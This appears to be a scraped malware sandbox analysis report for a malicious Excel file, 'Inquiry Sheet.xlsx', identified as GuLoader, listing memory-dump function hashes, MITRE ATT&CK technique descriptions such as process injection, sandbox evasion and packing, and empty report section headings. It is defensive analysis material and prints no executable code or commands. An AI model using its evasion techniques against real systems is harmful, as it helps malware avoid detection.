Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6e260106822b0e3ff672e6b56d499193e044cffcb3c5aa5be4014d351f1d23
Instruction ID: 59358390100485eff809691a3b3fa4b91a8d046c95ad9864595523c90dbe9c27
Opcode Fuzzy Hash: 9c6e260106822b0e3ff672e6b56d499193e044cffcb3c5aa5be4014d351f1d23
Instruction Fuzzy Hash: 9951397240876C4BDF36CF35A8853DABBA2AF55340F56805ADC858B205D7308942CB53

Uniqueness

Uniqueness Score: -1.00%

Function 003270D8, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2053fa25ca612f3416ee1f72512fef595b6026a4221f2149e6a5ab539e01ffbc
Instruction ID: b1f1eff0825e3ff3e1d1d102d38e4add300453cbfa7b620e5b6d7103869b5139
Opcode Fuzzy Hash: 2053fa25ca612f3416ee1f72512fef595b6026a4221f2149e6a5ab539e01ffbc
Instruction Fuzzy Hash: 8251FD7164838ACFDB35DF29DE91BEE7BA5BF48340F50812AAC4D8B205E7309A00DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00329B34, Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8562f879fb2e7b349d326e80d5ebb58ee508dcc0d2572296816601843d1690c2
Instruction ID: 29edb6c421e7cfcb9b179d9220b2a2c2e8e19044884dd61e38343614e917bae8
Opcode Fuzzy Hash: 8562f879fb2e7b349d326e80d5ebb58ee508dcc0d2572296816601843d1690c2
Instruction Fuzzy Hash: BC51E271508698DFDF75CF78AD913DA7BB5BF84301F65011AEC899B211C730A981CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003226E6, Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd5ba83ec963219f05d4d3451888e46769f7b056bd422853855a10d8122a2f3e
Instruction ID: 2e0be282fa8fd2737fd237beadf046eb305ff7d82d5fa8c6de6ff45508b4e13b
Opcode Fuzzy Hash: dd5ba83ec963219f05d4d3451888e46769f7b056bd422853855a10d8122a2f3e
Instruction Fuzzy Hash: 14519F72A18358EFCB789E69DC55AEE7BA5BF98310F00452DEC8EDB254C7304A81CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00329BF4, Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eed21f632a900fe413c54d1961ef91af017c545339ee13984c02861e0fe8a50d
Instruction ID: bb116464611ab60afdc114f55c9736f81b6145418fa0b2b9761d4952ee6fa854
Opcode Fuzzy Hash: eed21f632a900fe413c54d1961ef91af017c545339ee13984c02861e0fe8a50d
Instruction Fuzzy Hash: 4251E071508798DFDB75CE78ED917EABBB5BF85301F65011ADC899B200C730A981CB52

Uniqueness

Uniqueness Score: -1.00%

Function 003245D0, Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 144fdaa816a18c20b716e03525a2f5ef6f40423f559f171b15380985ff1f80d3
Instruction ID: c1a46a5638cfbe7be24688b4243a8c5551012951f73e83a9dc5e74d685f2abea
Opcode Fuzzy Hash: 144fdaa816a18c20b716e03525a2f5ef6f40423f559f171b15380985ff1f80d3
Instruction Fuzzy Hash: 12515870109358EFDB25AF75A891BEABBB5FF25301F964159FC8A9B111CB30C541CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00329A5E, Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65ce17e72a5a46a6a01c1dd5cb1275e8b4afb235f436572f47eae35bbbee73e9
Instruction ID: 562a8195ce4848637920bfdba49f13af8287ae28d0591749a6f219939f492d8b
Opcode Fuzzy Hash: 65ce17e72a5a46a6a01c1dd5cb1275e8b4afb235f436572f47eae35bbbee73e9
Instruction Fuzzy Hash: 7651F172508765DFDF758E789D957DABBB5AF88300FA6011ADC4C9B200C3306A818B66

Uniqueness

Uniqueness Score: -1.00%

Function 003244AC, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc5edee12f56096f582f768a8d6ae6f895853a409fe7a41e1e7389809d84a5b6
Instruction ID: c99a5500b6c4fd7ad789a55ced8b625cb73c2986b886fb855e2f3cbc7ae6b5ee
Opcode Fuzzy Hash: bc5edee12f56096f582f768a8d6ae6f895853a409fe7a41e1e7389809d84a5b6
Instruction Fuzzy Hash: E9512371508344DFDB689F25D841BEAB7F6BF60300F66845EEC8A8B261D730CA41CB12

Uniqueness

Uniqueness Score: -1.00%

Function 003271A4, Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90fd78cee051aefa810e969a7f32d8be0ba2dc02d40b557260459c74432a7f01
Instruction ID: e46a4975966eec8ddb0530ce8070964209cf497c833df98d7d1a2c2dd5a6deb9
Opcode Fuzzy Hash: 90fd78cee051aefa810e969a7f32d8be0ba2dc02d40b557260459c74432a7f01
Instruction Fuzzy Hash: 4251F07054839ACBDB39DE29ED91BEE7BA4BF18340F50452AED0D8B511E7309A00DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0032B61F, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eb7ed2f24d1df53b809f572fe993414efa01016892cd8d34d62fe53629b76b3
Instruction ID: 3fbb5091adc801c37359e015518bf4793739f673c5ad0bdf36102103d8ebacfe
Opcode Fuzzy Hash: 3eb7ed2f24d1df53b809f572fe993414efa01016892cd8d34d62fe53629b76b3
Instruction Fuzzy Hash: A0511572904398CFCB75CF35EC846DDB7A6BF65351FA60226EC08AB211D7309941CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00324548, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be38de8f5e0bb5b06f7438326339d15db3d8b11394da6aa6d2de86212ab2a63a
Instruction ID: a396ee131d2152e58e510e2ed1ebc90f454cffa6725d4216529bec8da3693710
Opcode Fuzzy Hash: be38de8f5e0bb5b06f7438326339d15db3d8b11394da6aa6d2de86212ab2a63a
Instruction Fuzzy Hash: FD413472545345DFDB649F299C41BEEB7F6BFA4300F66441EEC8A9B260D7308A41CB02

Uniqueness

Uniqueness Score: -1.00%

Function 00322A39, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09ae2ac1776a9527ee8d27311cdf53d1b73a857ea810e7aaf61d8cd42050b332
Instruction ID: 5bcc5c76d2bfbb1b7caae1f77ac36970a5d12b1563bb4c9fe3a399d1c9817e3f
Opcode Fuzzy Hash: 09ae2ac1776a9527ee8d27311cdf53d1b73a857ea810e7aaf61d8cd42050b332
Instruction Fuzzy Hash: DF417970508248AFCB299F35EC65AEFBBB5FF94340FA5012DEC8597211CB309842C745

Uniqueness

Uniqueness Score: -1.00%

Function 00329D5B, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f49617d52975d9f64ece8ee2481802adc6fd9051ca6b15e4c35f2cd0f61b912c
Instruction ID: 693cdce9e18af8ed9931944e1d74192b15106d729db3c46047fb05fc9ab12576
Opcode Fuzzy Hash: f49617d52975d9f64ece8ee2481802adc6fd9051ca6b15e4c35f2cd0f61b912c
Instruction Fuzzy Hash: 0241E172508795DFDFB5CE699E957DA7BB5BF84300F66001ADC8D9B600C3306A81CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00322E00, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ffb01bb995c984287fed57afb5621ee9293a1ab55937938b6ae232795249fd8
Instruction ID: e174518c4ac9ffb65fbebcc7de1a393b644ca72b973617924b6054189b0b8c11
Opcode Fuzzy Hash: 5ffb01bb995c984287fed57afb5621ee9293a1ab55937938b6ae232795249fd8
Instruction Fuzzy Hash: 1C41E07674528A9BDB749F29DC58BCB3BA3FFA8300F964118AC4DCB210C7348A41CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00326110, Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40afeb1f6d8b6d9172586a12dd9a992b1e83fddc9d8c24253bc229f69b9dc737
Instruction ID: 8dcedbc42b3d59e46dfdf8abfb3308b9c2f15cada8d610648547957301f8115a
Opcode Fuzzy Hash: 40afeb1f6d8b6d9172586a12dd9a992b1e83fddc9d8c24253bc229f69b9dc737
Instruction Fuzzy Hash: 0731CD70009758EBDBAA2F70A8435E9BBB1FF16301F551599BC8595022DB25A8A1CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0032AA40, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1a887e0af72791ad571bd498ebfd1f284509d4e3b6d87d672b11ba7c07e664d
Instruction ID: 6b1b72b73f536c85853fefcc2f77dd8991e0c4b9e84e8f564a5fe365bc10759f
Opcode Fuzzy Hash: b1a887e0af72791ad571bd498ebfd1f284509d4e3b6d87d672b11ba7c07e664d
Instruction Fuzzy Hash: 243189324087988FDF358E39E8543DABBA2AF62350F16811ACCC9CF255E3308542CB23

Uniqueness

Uniqueness Score: -1.00%

Function 003229FE, Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a65c1084f18cfea6f66fe508d286c9dd1c4b1f40e765233f423605d916fe30c7
Instruction ID: 3bc6471831521732b3ff2551934053fbac168dbd5c3cc8b5d1fb419242979df5
Opcode Fuzzy Hash: a65c1084f18cfea6f66fe508d286c9dd1c4b1f40e765233f423605d916fe30c7
Instruction Fuzzy Hash: E631E1726082549FDB649F25DC65BEFBBB2BF94350F56011DEC8AA7200D7309941CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0032A7CC, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c56aa334f7eb6ae51806faa958d9ce259511777484f05572efbde2aa1ceea5a9
Instruction ID: cb57f4af900acf18ed1d76fb94c2349bd45deb41f6ea0169bc1e593471396b68
Opcode Fuzzy Hash: c56aa334f7eb6ae51806faa958d9ce259511777484f05572efbde2aa1ceea5a9
Instruction Fuzzy Hash: E131D6724447D98FCF369F38E8A47E67BA1BF10350F5A815ACC9A9F241D7344A41C712

Uniqueness

Uniqueness Score: -1.00%

Function 00329829, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e1313c3275a27fcb67f10b7104992e733b3a05306707426b994c2f4a7b7b030
Instruction ID: ce6c850ad50e6214540bc014a5187947fb014c9f971fe62f2b68f5756c806990
Opcode Fuzzy Hash: 2e1313c3275a27fcb67f10b7104992e733b3a05306707426b994c2f4a7b7b030
Instruction Fuzzy Hash: 792155716062A8DFDF36AF38ED897CC3691BF69310F15451AEC0D8F201DB718A858B52

Uniqueness

Uniqueness Score: -1.00%

Function 00329176, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6b45c542f4d9ef9c68577f06881e436b30cfc74da284bcb1f9d23c9570ebff8
Instruction ID: a5ed04444283f50e31164039a05318f5299ffa1e6d204bff97f922d78dfc0492
Opcode Fuzzy Hash: d6b45c542f4d9ef9c68577f06881e436b30cfc74da284bcb1f9d23c9570ebff8
Instruction Fuzzy Hash: 5C21CD3564539ACFCB318FB8D9D07E733A5EF6A700F46452ECA8A8B211D3318842CB55

Uniqueness

Uniqueness Score: -1.00%

Function 003292EB, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 292be6f34d9081a66c54bd8f9affddf61fc6b1631c8a90bb881f4e89bec96af5
Instruction ID: ba2cad28bdf94eab89c0ffe9d2b9dc5cc7cb19686a598f6c7dd07e3918abd0c6
Opcode Fuzzy Hash: 292be6f34d9081a66c54bd8f9affddf61fc6b1631c8a90bb881f4e89bec96af5
Instruction Fuzzy Hash: 6E010474B41658CFCB35DE18D9C4BDA73B2EF58300F81846AEA0D8B251D3309E41CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00326503, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 00328C25, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Inquiry Sheet.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 1296 Parent PID: 596

General

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 1532 Parent PID: 596

Function 00402B34, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 100
COMMON

Function 004014BC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
COMMON